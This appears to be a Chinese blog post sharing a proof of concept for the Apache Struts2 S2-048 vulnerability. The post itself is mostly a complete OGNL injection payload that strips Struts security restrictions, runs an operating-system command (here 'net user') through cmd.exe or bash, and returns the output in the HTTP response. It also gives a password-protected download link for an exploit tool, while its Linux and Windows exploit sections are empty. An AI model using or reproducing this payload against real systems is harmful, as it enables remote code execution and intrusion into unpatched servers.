標籤:

Struts2-048(內附Exp & Poc)完美解決中文亂碼

02-08

POC:

%{(#secfree=multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=net user).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}

EXP(完美解決中文亂碼):

Linux下:

Windows下:

下載鏈接:鏈接:share.weiyun.com/81ba59 (密碼:J0MBlS)


推薦閱讀:

WebLogic WLS-WebServices組件反序列化漏洞分析
如何看待谷歌在微軟發布補丁之前公布並演示相關漏洞?
一個幹掉所有「暴雪遊戲」的漏洞,暴雪玩家小心了!
操作系統為什麼都有無數的漏洞?是故意留下的還是技術上無法達到完美?
Apktool未正確解析XML導致的XXE漏洞分析

TAG:Struts2 | 漏洞 |